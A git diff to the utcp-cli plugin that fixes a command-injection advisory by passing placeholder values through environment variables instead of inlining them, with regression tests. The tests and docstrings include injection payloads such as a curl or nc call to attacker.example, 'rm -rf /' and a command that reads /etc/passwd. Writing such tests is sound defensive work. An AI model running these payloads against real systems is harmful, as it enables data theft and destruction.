changed, 631 insertions(+), 248 deletions(-) diff --git a/plugins/communication_protocols/cli/pyproject.toml b/plugins/communication_protocols/cli/pyproject.toml index 135d7bb..770c017 100644 --- a/plugins/communication_protocols/cli/pyproject.toml +++ b/plugins/communication_protocols/cli/pyproject.toml @@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta" [project] name = "utcp-cli" -version = "1.1.2" +version = "1.1.3" authors = [ { name = "UTCP Contributors" }, ] diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py index a741f24..1aada70 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py @@ -15,15 +15,34 @@ class CommandStep(BaseModel): placeholders that will be replaced with values from tool_args. Can also reference previous command outputs using $CMD_0_OUTPUT, $CMD_1_OUTPUT, etc. - Placeholder substitution is shell-quoted (`shlex.quote` on Unix, - PowerShell single-quoted literals on Windows) so that - `tool_args` values cannot inject extra commands. As a - consequence, each `UTCP_ARG_..._UTCP_END` placeholder always - expands to **exactly one shell token**. Tools that previously - relied on a single placeholder splitting into multiple flags - (e.g. `UTCP_ARG_flags_UTCP_END` -> `--verbose --debug`) must now - use one placeholder per intended flag. This change ships with - utcp-cli 1.1.2 and addresses GHSA-33p6-5jxp-p3x4. + Placeholders are NOT inlined as text. Instead the protocol + emits a context-aware shell variable reference (`"$VAR"` / + `${VAR}` / `$env:VAR`) and ships the actual `tool_args` + value to the subprocess via an environment variable, so the + shell expands the value AFTER it has parsed the script. + Attacker-controlled bytes therefore cannot inject commands + or escape any quoting context. + + A placeholder always substitutes a **single logical value** + (never a list of shell words) -- the substituted value + cannot be reinterpreted as additional shell syntax. Several + placeholders may appear within the same quoted region (e.g. + ``"https://api/UTCP_ARG_id_UTCP_END/UTCP_ARG_action_UTCP_END"``) + and they compose with the surrounding literal text into one + shell argument. Tools that previously relied on a single + placeholder splitting into multiple flags (e.g. + ``UTCP_ARG_flags_UTCP_END`` -> ``--verbose --debug``) must + now use one placeholder per intended flag. This change + ships with utcp-cli 1.1.3 and addresses GHSA-33p6-5jxp-p3x4 + (including the residual double-quote-context bypass that + the inline ``shlex.quote`` strategy in 1.1.2 left open). + + PowerShell limitation: a placeholder appearing inside a + single-quoted PowerShell string (``'...'``) raises + ``ValueError`` at script-build time -- PowerShell does not + expand variables inside single quotes, and rewriting the + surrounding token is too brittle. Use a double-quoted + string (``"..."``) instead. append_to_final_output: Whether this command's output should be included in the final result. If not specified, defaults to False for all commands except the last one. @@ -48,9 +67,11 @@ class CommandStep(BaseModel): command: str = Field( description=( "Command string to execute, may contain UTCP_ARG_argname_UTCP_END " - "placeholders. Each placeholder is shell-quoted at substitution " - "time and therefore expands to exactly one shell token; use one " - "placeholder per intended argument." + "placeholders. Each placeholder substitutes a single value via " + "a shell-variable reference chosen for its surrounding quote " + "context; substituted values cannot be reinterpreted as " + "additional shell syntax. Several placeholders may appear in " + "the same quoted region and compose into one argument." ) ) append_to_final_output: Optional[bool] = Field( @@ -81,15 +102,29 @@ class CliCallTemplate(CallTemplate): Example: `echo "Previous result: $CMD_0_OUTPUT"` - **Argument Substitution and Quoting (utcp-cli >= 1.1.2):** - `UTCP_ARG_argname_UTCP_END` placeholders are replaced with the - corresponding `tool_args` value, shell-quoted for the target shell - (`shlex.quote` on Unix, PowerShell single-quoted literal on Windows). - Each placeholder therefore expands to exactly one shell token. If a - tool needs multiple flags or arguments, define multiple placeholders - (one per flag) instead of relying on a single placeholder splitting - on whitespace. This change closes the command-injection vector - tracked as GHSA-33p6-5jxp-p3x4. + **Argument Substitution (utcp-cli >= 1.1.3):** + ``UTCP_ARG_argname_UTCP_END`` placeholders are replaced with a + context-aware shell variable reference (``"$VAR"`` outside quotes, + ``${VAR}`` inside double quotes, an adjacent-quote concat trick + inside single-quoted bash). The actual ``tool_args`` value is + shipped to the subprocess via a fresh, per-invocation env var; the + shell expands it at runtime AFTER it has parsed the script, so + attacker-controlled bytes cannot inject commands or escape any + quoting context. + + A placeholder always substitutes a single logical value (never a + list of shell words). Several placeholders may appear in one + quoted region and compose with the surrounding text into one + argument (e.g. + ``"https://api/UTCP_ARG_id_UTCP_END/UTCP_ARG_action_UTCP_END"``). + If a tool needs multiple separate flags, use one placeholder per + flag in bare position. PowerShell single-quoted strings cannot + expand variables, so a placeholder inside ``'...'`` on Windows + raises ``ValueError`` at script-build time; use a double-quoted + string instead. This change closes the command-injection vector + tracked as GHSA-33p6-5jxp-p3x4 (and its residual + double-quote-context bypass that the inline ``shlex.quote`` + strategy in 1.1.2 left open). **Subprocess Environment (utcp-cli >= 1.1.2):** The CLI subprocess no longer inherits the full host environment. @@ -221,8 +256,12 @@ class CliCallTemplate(CallTemplate): commands: List[CommandStep] = Field( description=( "List of commands to execute in order. Each command can contain " - "UTCP_ARG_argname_UTCP_END placeholders, which are shell-quoted " - "on substitution and therefore expand to exactly one shell token." + "UTCP_ARG_argname_UTCP_END placeholders, which substitute a " + "single value via a shell-variable reference chosen for the " + "surrounding quote context. Substituted values cannot be " + "reinterpreted as additional shell syntax. Several placeholders " + "may appear in the same quoted region and compose into one " + "argument." ) ) env_vars: Optional[Dict[str, str]] = Field( diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py index 8278c3c..d4d267c 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py @@ -20,9 +20,9 @@ import json import os import re -import shlex +import secrets import sys -from typing import Dict, Any, List, Optional, Callable, AsyncGenerator +from typing import Dict, Any, List, Optional, Tuple, AsyncGenerator from utcp.interfaces.communication_protocol import CommunicationProtocol from utcp.data.call_template import CallTemplate, CallTemplateSerializer @@ -241,9 +241,15 @@ async def register_manual(self, caller, manual_call_template: CallTemplate) -> R try: # Execute commands using the same approach as call_tool but with no arguments - env = self._prepare_environment(manual_call_template) - shell_script = self._build_combined_shell_script(manual_call_template.commands, {}) - + base_env = self._prepare_environment(manual_call_template) + shell_script, arg_env = self._build_combined_shell_script( + manual_call_template.commands, {} + ) + # Per-call __UTCP_ARG_* env vars carry placeholder values; + # layer them on top of the inherited+caller-supplied env so + # the references emitted into the script actually resolve. + env = {**base_env, **arg_env} + self._log_info(f"Executing shell script for tool discovery from provider '{manual_call_template.name}'") stdout, stderr, return_code = await self._execute_shell_script( @@ -323,68 +329,277 @@ async def deregister_manual(self, caller, manual_call_template: CallTemplate) -> ) @staticmethod - def _shell_quote(value: str) -> str: - """Quote a single value so it is interpreted as one literal token by - the target shell (`bash` on Unix, `powershell.exe` on Windows). - - On Unix we delegate to `shlex.quote`. On Windows we wrap the value in - a PowerShell single-quoted literal: inside such a literal everything - is taken verbatim except `'` itself, which is escaped by doubling - (`''`). This blocks the metacharacters PowerShell would otherwise - interpret (`;`, `&`, `|`, `` ` ``, `$`, `(`, `)`, `<`, `>`, line - breaks). - - Backs GHSA-33p6-5jxp-p3x4: the previous substitution did - `str(tool_args[arg_name])` directly into the shell script, which - allowed arbitrary command injection (e.g. - `"data.csv; curl http://attacker.example/$(cat /etc/passwd)"`). + def _make_nonce() -> str: + """Generate an unguessable nonce that namespaces the env vars used + for argument substitution within a single tool invocation. + + Prevents a template author from being able to write a literal + ``${__UTCP_ARG__}`` reference that collides with our + substitution slot, which would re-introduce + unquoted-variable-expansion injection. """ - if os.name == 'nt': - return "'" + value.replace("'", "''") + "'" - return shlex.quote(value) + return secrets.token_hex(8) - def _substitute_utcp_args(self, command: str, tool_args: Dict[str, Any]) -> str: - """Substitute UTCP_ARG placeholders in command string with tool arguments. + @staticmethod + def _env_var_name(nonce: str, arg_name: str) -> str: + """Compute the env-var name that carries one substituted tool_arg + value into the subprocess. The nonce is fresh per invocation so + ``${__UTCP_ARG__}`` literals cannot exist in + templates authored before invocation time. + """ + return f"__UTCP_ARG_{nonce}_{arg_name}" - Each substituted value is shell-quoted for the target shell so that - attacker-controlled `tool_args` cannot escape the placeholder and - inject extra commands. As a side effect, a placeholder always - expands to exactly one shell token: callers that need to pass - multiple flags / arguments must use multiple placeholders rather - than splitting a single string at runtime. + _PLACEHOLDER_RE = re.compile(r'UTCP_ARG_([a-zA-Z0-9_]+?)_UTCP_END') + + def _substitute_utcp_args( + self, + command: str, + tool_args: Dict[str, Any], + nonce: str, + ) -> Tuple[str, Dict[str, str]]: + """Substitute ``UTCP_ARG__UTCP_END`` placeholders in a + command string by emitting context-appropriate shell variable + references and recording the actual values as env vars on the + returned dict. The caller wires those env vars into the + subprocess (alongside the call template's ``env_vars`` and the + host-inheritance allowlist) so the shell expands them at + runtime, AFTER it has already parsed the script. As a result, + attacker-controlled ``tool_args`` never get spliced into the + script source and therefore cannot inject commands or escape + any quoting context. + + Quote-state tracking ensures the emitted reference is correct + for its surrounding context: + + bash (Unix): + - bare: ``"$VAR"`` (quoted: no word splitting) + - inside double quotes: ``${VAR}`` (bash expands inside dq) + - inside single quotes: ``'"$VAR"'`` (close sq, dq with var, + reopen sq -- bash treats + adjacent quoted regions + as a single token) + + powershell (Windows): + - bare: ``$env:VAR`` + - inside double quotes: ``$env:VAR`` (PS expands inside dq) + - inside single quotes: ValueError -- PS does not expand inside + single-quoted strings, so + we cannot safely + substitute without + rewriting the entire + surrounding token. Author + must use a double-quoted + string. + + Backs GHSA-33p6-5jxp-p3x4. An earlier fix that did inline + ``shlex.quote``-style substitution was still vulnerable when + the placeholder sat inside a surrounding ``"`` region: e.g. + template ``curl "https://api/UTCP_ARG_id_UTCP_END"`` with + ``id = '"; rm -rf /; "'`` produced + ``curl "https://api/'"; rm -rf /; "'"``, where bash's parser + closed the outer dq early and ran the injected commands. Args: - command: Command string containing UTCP_ARG_argname_UTCP_END placeholders - tool_args: Dictionary of argument names and values + command: Command string containing + ``UTCP_ARG__UTCP_END`` placeholders. + tool_args: Dictionary of argument names and values. + nonce: Per-invocation nonce used to namespace generated env + vars. Returns: - Command string with placeholders replaced by shell-quoted values + Tuple ``(command, env)`` where ``command`` is safe to embed + in a shell script and ``env`` is the additional env vars + the subprocess must receive for the references to expand. """ - # Pattern to match UTCP_ARG_argname_UTCP_END - pattern = r'UTCP_ARG_(.+?)_UTCP_END' + if os.name == 'nt': + return self._substitute_powershell(command, tool_args, nonce) + return self._substitute_bash(command, tool_args, nonce) - def replace_placeholder(match): - arg_name = match.group(1) - if arg_name in tool_args: - return self._shell_quote(str(tool_args[arg_name])) + def _substitute_bash( + self, + command: str, + tool_args: Dict[str, Any], + nonce: str, + ) -> Tuple[str, Dict[str, str]]: + env: Dict[str, str] = {} + out: List[str] = [] + state = "normal" # "normal" | "dq" | "sq" + i = 0 + n = len(command) + + def collect(name: str) -> str: + v = self._env_var_name(nonce, name) + if name in tool_args: + env[v] = str(tool_args[name]) else: - self._log_error(f"Missing argument '{arg_name}' for placeholder in command: {command}") - return self._shell_quote(f"MISSING_ARG_{arg_name}") + self._log_error( + f"Missing argument '{name}' for placeholder in command: {command}" + ) + env[v] = f"MISSING_ARG_{name}" + return v + + while i < n: + m = self._PLACEHOLDER_RE.match(command, i) + if m is not None: + v = collect(m.group(1)) + if state == "normal": + out.append(f'"${v}"') + elif state == "dq": + out.append(f"${{{v}}}") + else: # sq -- break out, dq the var, reopen sq + out.append(f"'\"${v}\"'") + i = m.end() + continue + + ch = command[i] + if state == "normal": + if ch == "'": + state = "sq" + out.append(ch) + elif ch == '"': + state = "dq" + out.append(ch) + elif ch == "\\" and i + 1 < n: + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + else: + out.append(ch) + elif state == "dq": + if ch == "\\" and i + 1 < n and command[i + 1] in '"\\$`\n': + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + if ch == '"': + state = "normal" + out.append(ch) + else: + out.append(ch) + else: # sq -- only `'` ends the string. No expansion, no escapes. + if ch == "'": + state = "normal" + out.append(ch) + else: + out.append(ch) + i += 1 - return re.sub(pattern, replace_placeholder, command) + return "".join(out), env + + def _substitute_powershell( + self, + command: str, + tool_args: Dict[str, Any], + nonce: str, + ) -> Tuple[str, Dict[str, str]]: + env: Dict[str, str] = {} + out: List[str] = [] + state = "normal" # "normal" | "dq" | "sq" + i = 0 + n = len(command) + + def collect(name: str) -> str: + v = self._env_var_name(nonce, name) + if name in tool_args: + env[v] = str(tool_args[name]) + else: + self._log_error( + f"Missing argument '{name}' for placeholder in command: {command}" + ) + env[v] = f"MISSING_ARG_{name}" + return v + + while i < n: + m = self._PLACEHOLDER_RE.match(command, i) + if m is not None: + if state == "sq": + raise ValueError( + f"Placeholder UTCP_ARG_{m.group(1)}_UTCP_END appears " + f"inside a PowerShell single-quoted string in " + f"command: {command}\n" + f"PowerShell does not expand variables inside single " + f"quotes, so this cannot be substituted safely. Use a " + f'double-quoted string ("...") around the placeholder ' + f"instead." + ) + v = collect(m.group(1)) + # Both bare and dq accept `$env:VAR` -- PowerShell expands + # it inside double-quoted strings. + out.append(f"$env:{v}") + i = m.end() + continue + + ch = command[i] + if state == "normal": + if ch == "'": + state = "sq" + out.append(ch) + elif ch == '"': + state = "dq" + out.append(ch) + elif ch == "`" and i + 1 < n: + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + else: + out.append(ch) + elif state == "dq": + if ch == "`" and i + 1 < n: + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + if ch == '"': + state = "normal" + out.append(ch) + else: + out.append(ch) + else: # sq -- PS: `''` is an escaped single quote inside the literal. + if ch == "'" and i + 1 < n and command[i + 1] == "'": + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + if ch == "'": + state = "normal" + out.append(ch) + else: + out.append(ch) + i += 1 + + return "".join(out), env - def _build_combined_shell_script(self, commands: List[CommandStep], tool_args: Dict[str, Any]) -> str: + def _build_combined_shell_script( + self, + commands: List[CommandStep], + tool_args: Dict[str, Any], + ) -> Tuple[str, Dict[str, str]]: """Build a combined shell script from multiple commands. - + + Returns both the script and the env-var contributions + accumulated across all command steps. Callers must merge these + env vars into the subprocess environment so the placeholder + references the script writes (``$VAR`` / ``${VAR}`` / + ``$env:VAR``) actually resolve to the original tool_arg values + at runtime. + Args: commands: List of CommandStep objects to combine tool_args: Tool arguments for placeholder substitution - + Returns: - Shell script string that executes all commands in sequence + Tuple ``(script, env)`` -- script is the shell script + source, env is the additional ``__UTCP_ARG_*`` env vars to + inject. """ - script_lines = [] - + script_lines: List[str] = [] + accumulated_env: Dict[str, str] = {} + # One nonce per script -- shared across all command steps so the + # env-var contributions land in a consistent namespace. + nonce = self._make_nonce() + # Add error handling and setup if os.name == 'nt': # PowerShell script @@ -395,14 +610,18 @@ def _build_combined_shell_script(self, commands: List[CommandStep], tool_args: D script_lines.append('#!/bin/bash') # Don't use set -e to allow error output capture and processing script_lines.append('# Variables to store command outputs') - + # Execute each command and store output in variables for i, command_step in enumerate(commands): - # Substitute UTCP_ARG placeholders - substituted_command = self._substitute_utcp_args(command_step.command, tool_args) - + # Substitute UTCP_ARG placeholders -- emits shell-variable + # references, contributes the actual values via env. + substituted_command, step_env = self._substitute_utcp_args( + command_step.command, tool_args, nonce + ) + accumulated_env.update(step_env) + var_name = f"CMD_{i}_OUTPUT" - + if os.name == 'nt': # PowerShell - capture command output in variable script_lines.append(f'${var_name} = {substituted_command} 2>&1 | Out-String') @@ -427,8 +646,8 @@ def _build_combined_shell_script(self, commands: List[CommandStep], tool_args: D else: # Unix shell script_lines.append(f'echo "${{{var_name}}}"') - - return '\n'.join(script_lines) + + return '\n'.join(script_lines), accumulated_env async def _execute_shell_script(self, script: str, env: Dict[str, str], timeout: float = 60.0, working_dir: Optional[str] = None) -> tuple[str, str, int]: """Execute a shell script in a single subprocess. @@ -697,11 +916,17 @@ async def call_tool(self, caller, tool_name: str, tool_args: Dict[str, Any], too self._log_info(f"Executing CLI tool '{tool_name}' with {len(tool_call_template.commands)} command(s) in single subprocess") try: - env = self._prepare_environment(tool_call_template) - - # Build combined shell script with output capture - shell_script = self._build_combined_shell_script(tool_call_template.commands, tool_args) - + base_env = self._prepare_environment(tool_call_template) + + # Build combined shell script with output capture. The + # script's placeholders are emitted as `$VAR` / `${VAR}` / + # `$env:VAR` references; the actual tool_arg values come + # back as `arg_env`. + shell_script, arg_env = self._build_combined_shell_script( + tool_call_template.commands, tool_args + ) + env = {**base_env, **arg_env} + self._log_info("Executing combined shell script") # Execute the combined script in a single subprocess diff --git a/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py b/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py index e99a4b0..dec2616 100644 --- a/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py @@ -488,23 +488,28 @@ async def test_env_vars_and_working_dir_combined(transport: CliCommunicationProt @pytest.mark.asyncio async def test_placeholder_substitution(): - """Test that UTCP_ARG placeholders are properly substituted.""" + """Test that UTCP_ARG placeholders are properly substituted. + + As of utcp-cli 1.1.3, substitution emits a shell-variable reference + in the script and ships the actual value via env var. + """ transport = CliCommunicationProtocol() - - # Test placeholder substitution using the actual method name + command_template = "echo UTCP_ARG_message_UTCP_END --count UTCP_ARG_count_UTCP_END" args = { "message": "hello world", - "count": 42 + "count": 42, } - - substituted = transport._substitute_utcp_args(command_template, args) - - # Check that placeholders are properly replaced + nonce = "TESTNONCE" + substituted, env = transport._substitute_utcp_args(command_template, args, nonce) + + # Placeholder form must be gone from the script. assert "UTCP_ARG_message_UTCP_END" not in substituted assert "UTCP_ARG_count_UTCP_END" not in substituted - assert "hello world" in substituted - assert "42" in substituted + # Raw values must appear in the env contribution, not the script. + assert env[f"__UTCP_ARG_{nonce}_message"] == "hello world" + assert env[f"__UTCP_ARG_{nonce}_count"] == "42" + assert "hello world" not in substituted @pytest.mark.asyncio @@ -644,8 +649,8 @@ async def test_command_output_referencing(transport: CliCommunicationProtocol, p ) # Build the shell script to verify it contains the expected structure - script = transport._build_combined_shell_script(call_template.commands, {}) - + script, _ = transport._build_combined_shell_script(call_template.commands, {}) + # Verify the script contains output capture variables assert "CMD_0_OUTPUT" in script assert "echo generated_value" in script diff --git a/plugins/communication_protocols/cli/tests/test_cli_security.py b/plugins/communication_protocols/cli/tests/test_cli_security.py index b90559f..48ca0e9 100644 --- a/plugins/communication_protocols/cli/tests/test_cli_security.py +++ b/plugins/communication_protocols/cli/tests/test_cli_security.py @@ -3,15 +3,20 @@ Pin the fixes for: - GHSA-33p6-5jxp-p3x4 (CWE-78, command injection via unsanitized - `tool_args` interpolation in `_substitute_utcp_args`). + ``tool_args`` interpolation in ``_substitute_utcp_args``). - GHSA-5v57-8rxj-3p2r (CWE-526, full host environment leaked to the - CLI subprocess via `_prepare_environment`). - -Each behavior is locked in here so a regression that re-introduces the -historical bypass fails this file rather than silently shipping. + CLI subprocess via ``_prepare_environment``). + +As of utcp-cli 1.1.3, substitution is context-aware: it tracks the +surrounding quote state in the template and emits a shell variable +reference (``$VAR`` / ``${VAR}`` / ``$env:VAR``) for each placeholder, +then carries the actual values to the subprocess via env vars. The +shell expands them at runtime, AFTER parsing, so attacker-controlled +bytes never enter the parser. Each invocation uses a fresh nonce so a +template author cannot collide with the injection slot. """ import os -import shlex +import re import sys import tempfile @@ -19,7 +24,14 @@ import pytest_asyncio from utcp_cli.cli_communication_protocol import CliCommunicationProtocol -from utcp_cli.cli_call_template import CliCallTemplate +from utcp_cli.cli_call_template import CliCallTemplate, CliCallTemplateSerializer + + +NONCE = "TESTNONCE" + + +def _v(name: str) -> str: + return f"__UTCP_ARG_{NONCE}_{name}" @pytest_asyncio.fixture @@ -28,93 +40,172 @@ async def transport() -> CliCommunicationProtocol: # --------------------------------------------------------------------------- -# GHSA-33p6-5jxp-p3x4 — _substitute_utcp_args must shell-quote substituted -# values so attacker-controlled tool_args can't escape into the script. +# Argument substitution must: +# 1. NOT splice attacker-controlled bytes into the parsed script. +# 2. Emit a reference whose form matches the surrounding quote context. +# 3. Carry the raw value via the returned env contribution. # --------------------------------------------------------------------------- -class TestArgSubstitutionQuoting: +class TestSubstitutionContextAwareEmission: + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_bare_emits_quoted_var(self, transport): + cmd, env = transport._substitute_utcp_args( + "mytool UTCP_ARG_x_UTCP_END", {"x": "a b"}, NONCE + ) + assert cmd == f'mytool "${_v("x")}"' + assert env[_v("x")] == "a b" + + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_dq_emits_braced_var(self, transport): + cmd, env = transport._substitute_utcp_args( + 'echo "Hi UTCP_ARG_x_UTCP_END!"', {"x": "a; rm /"}, NONCE + ) + assert cmd == f'echo "Hi ${{{_v("x")}}}!"' + assert env[_v("x")] == "a; rm /" + + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_sq_emits_breakout_concat(self, transport): + cmd, env = transport._substitute_utcp_args( + "echo 'Hi UTCP_ARG_x_UTCP_END!'", {"x": "a; rm /"}, NONCE + ) + # Bash adjacent-quote concat: 'Hi '"$VAR"'!' -> single token. + assert cmd == f"""echo 'Hi '"${_v("x")}"'!'""" + assert env[_v("x")] == "a; rm /" + + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_escaped_dq_does_not_flip_state(self, transport): + # `echo "esc\" UTCP_ARG_a_UTCP_END"` -- the \" is escaped so dq + # remains open, placeholder must emit ${VAR}. + cmd, _ = transport._substitute_utcp_args( + 'echo "esc\\" UTCP_ARG_a_UTCP_END"', {"a": "v"}, NONCE + ) + assert cmd == f'echo "esc\\" ${{{_v("a")}}}"' + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_bare_emits_env_var(self, transport): + cmd, env = transport._substitute_utcp_args( + "mytool UTCP_ARG_x_UTCP_END", {"x": "a b"}, NONCE + ) + assert cmd == f"mytool $env:{_v('x')}" + assert env[_v("x")] == "a b" + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_dq_emits_env_var(self, transport): + cmd, env = transport._substitute_utcp_args( + 'Write-Output "Hi UTCP_ARG_x_UTCP_END!"', {"x": "a; rm /"}, NONCE + ) + assert cmd == f'Write-Output "Hi $env:{_v("x")}!"' + assert env[_v("x")] == "a; rm /" + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_sq_raises_with_clear_message(self, transport): + with pytest.raises(ValueError, match="single-quoted"): + transport._substitute_utcp_args( + "Write-Output 'Hi UTCP_ARG_x_UTCP_END'", {"x": "a"}, NONCE + ) + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_backtick_in_dq_preserved(self, transport): + cmd, _ = transport._substitute_utcp_args( + 'Write-Output "pre `"x`" UTCP_ARG_a_UTCP_END"', {"a": "v"}, NONCE + ) + # dq state must still be active when placeholder is hit. + assert cmd == f'Write-Output "pre `"x`" $env:{_v("a")}"' + + def test_multiple_placeholders_share_namespace(self, transport): + cmd, env = transport._substitute_utcp_args( + "cmd UTCP_ARG_a_UTCP_END UTCP_ARG_b_UTCP_END", + {"a": "1", "b": "2"}, + NONCE, + ) + assert env[_v("a")] == "1" + assert env[_v("b")] == "2" + assert not re.search(r"UTCP_ARG_[a-zA-Z0-9_]+_UTCP_END", cmd) + + def test_multiple_placeholders_in_same_dq_compose(self, transport): + # The doc-claimed pattern: several placeholders within the same + # quoted region should compose into one argument with the + # surrounding literals. + cmd, env = transport._substitute_utcp_args( + 'curl "https://api/UTCP_ARG_id_UTCP_END/UTCP_ARG_action_UTCP_END"', + {"id": "abc", "action": "del"}, + NONCE, + ) + if os.name == "nt": + assert cmd == f'curl "https://api/$env:{_v("id")}/$env:{_v("action")}"' + else: + assert ( + cmd + == f'curl "https://api/${{{_v("id")}}}/${{{_v("action")}}}"' + ) + + def test_missing_arg_recorded_via_env(self, transport): + cmd, env = transport._substitute_utcp_args( + "cmd UTCP_ARG_x_UTCP_END", {}, NONCE + ) + assert env[_v("x")] == "MISSING_ARG_x" + assert "UTCP_ARG_x_UTCP_END" not in cmd + @pytest.mark.parametrize( - "value", + "payload", [ - "data.csv; curl http://attacker.example", - "data.csv && rm -rf /", - "data.csv | nc attacker.example 9999", - "data.csv `id`", - "data.csv $(id)", + 'data.csv; curl http://attacker.example', + 'data.csv && rm -rf /', + 'data.csv | nc attacker.example 9999', + 'data.csv `id`', + 'data.csv $(id)', 'data.csv"; echo pwned; "', - "data.csv\nrm -rf /", - "value with spaces", + 'value with spaces', "value'with'quote", + '"; rm -rf /; "', ], ) - def test_shell_metacharacters_are_quoted(self, transport, value): - substituted = transport._substitute_utcp_args( - "echo UTCP_ARG_x_UTCP_END", {"x": value} - ) - # The placeholder must be gone. - assert "UTCP_ARG_x_UTCP_END" not in substituted - # The original value must still be present (just quoted), so the - # tool actually sees it. - # On Unix shlex.quote may fully wrap in single quotes; on Windows we - # wrap in single quotes and double internal `'`. Either way the - # underlying characters appear somewhere in the substituted string. - assert any(part in substituted for part in value.split("'")) - - def test_unix_quoting_uses_shlex(self, transport, monkeypatch): - monkeypatch.setattr(os, "name", "posix") - out = transport._substitute_utcp_args( - "run UTCP_ARG_x_UTCP_END", {"x": "a; rm -rf /"} - ) - # shlex.quote wraps anything containing shell metas in single quotes. - assert out == f"run {shlex.quote('a; rm -rf /')}" - assert "; rm -rf /" not in out.replace(shlex.quote("a; rm -rf /"), "") - - def test_windows_quoting_doubles_single_quote(self, transport, monkeypatch): - monkeypatch.setattr(os, "name", "nt") - out = transport._substitute_utcp_args( - "Get-Item UTCP_ARG_x_UTCP_END", - {"x": "C:\\Users\\bob's file.txt; whoami"}, - ) - # PowerShell single-quoted literal; embedded ' becomes ''. - assert out == "Get-Item 'C:\\Users\\bob''s file.txt; whoami'" - - def test_windows_quoting_blocks_powershell_metacharacters(self, transport, monkeypatch): - monkeypatch.setattr(os, "name", "nt") - for payload in [ - "x; whoami", - "x | whoami", - "x & whoami", - "x`whoami`", - "x$(whoami)", - "x\nwhoami", - ]: - out = transport._substitute_utcp_args( - "Get-Item UTCP_ARG_x_UTCP_END", {"x": payload} + def test_attacker_bytes_never_appear_in_substituted_command( + self, transport, payload + ): + # Headline guarantee: SCRIPT contains only our reference + the + # template literal chars. Attacker bytes go into env. + if os.name == "nt": + templates = [ + "Write-Output UTCP_ARG_id_UTCP_END", + 'Write-Output "URL=UTCP_ARG_id_UTCP_END"', + ] + else: + templates = [ + "curl UTCP_ARG_id_UTCP_END", + 'curl "https://api/UTCP_ARG_id_UTCP_END"', + "curl 'https://api/UTCP_ARG_id_UTCP_END'", + ] + for tpl in templates: + cmd, env = transport._substitute_utcp_args( + tpl, {"id": payload}, NONCE ) - # The whole payload must be wrapped as a single-quoted literal. - assert out.startswith("Get-Item '") - assert out.endswith("'") - # No unescaped single quote should appear in the middle. - inner = out[len("Get-Item '"):-1] - assert "'" not in inner.replace("''", "") - - def test_missing_arg_placeholder_is_also_quoted(self, transport, monkeypatch): - # The fallback path used to return a bare `MISSING_ARG_` token, - # which broke the invariant that every substitution is one shell - # token. Quote it for defense in depth. - monkeypatch.setattr(os, "name", "posix") - out = transport._substitute_utcp_args( - "echo UTCP_ARG_missing_UTCP_END", {} + # No raw payload metacharacters should appear in cmd. We + # check for `;` which is the canonical injection marker. + assert ";" not in cmd, ( + f"payload bytes leaked into substituted command for " + f"template {tpl!r}: cmd={cmd!r}" + ) + # And the value must round-trip through env. + assert env[_v("id")] == payload + + def test_nonce_changes_between_invocations(self, transport): + # Drive the public path twice; scripts must use different + # env-var names each run. + from utcp_cli.cli_call_template import CommandStep + + commands = [CommandStep(command="echo UTCP_ARG_x_UTCP_END")] + a_script, a_env = transport._build_combined_shell_script( + commands, {"x": "v"} ) - assert "UTCP_ARG_missing_UTCP_END" not in out - # Either the literal token, or its shlex.quote'd form (alphanum + - # underscores normally don't need quoting): - assert "MISSING_ARG_missing" in out + b_script, b_env = transport._build_combined_shell_script( + commands, {"x": "v"} + ) + assert next(iter(a_env.keys())) != next(iter(b_env.keys())) # --------------------------------------------------------------------------- -# GHSA-5v57-8rxj-3p2r — _prepare_environment must NOT leak the full host -# environment into the CLI subprocess. +# _prepare_environment must NOT leak the full host environment. # --------------------------------------------------------------------------- class TestPreparedEnvironmentDoesNotLeakSecrets: @@ -138,12 +229,10 @@ def test_secrets_in_host_env_do_not_propagate(self, transport, monkeypatch): assert k not in env, ( f"{k} leaked from host environment into CLI subprocess " "(GHSA-5v57-8rxj-3p2r). Only the safe-keys allowlist plus " - "provider.env_vars should propagate." + "provider.env_vars / inherit_env_vars should propagate." ) def test_explicit_env_vars_are_preserved(self, transport, monkeypatch): - # Caller can still inject extra env explicitly via env_vars, even - # for keys that are otherwise blocked. monkeypatch.setenv("OPENAI_API_KEY", "host-value") provider = CliCallTemplate( commands=[{"command": "echo hi"}], @@ -154,7 +243,6 @@ def test_explicit_env_vars_are_preserved(self, transport, monkeypatch): assert env["MY_FLAG"] == "1" def test_essentials_are_preserved(self, transport, monkeypatch): - # PATH must propagate or no binary can be located. monkeypatch.setenv("PATH", "/usr/local/bin:/usr/bin:/bin") provider = CliCallTemplate(commands=[{"command": "echo hi"}]) env = transport._prepare_environment(provider) @@ -170,11 +258,8 @@ def test_env_vars_override_safe_defaults(self, transport, monkeypatch): assert env["PATH"] == "/custom/bin" def test_inherit_env_vars_passes_named_host_secrets(self, transport, monkeypatch): - # Caller can opt specific host secrets into the subprocess by name - # without copying their values into the call template. monkeypatch.setenv("OPENAI_API_KEY", "sk-from-host") 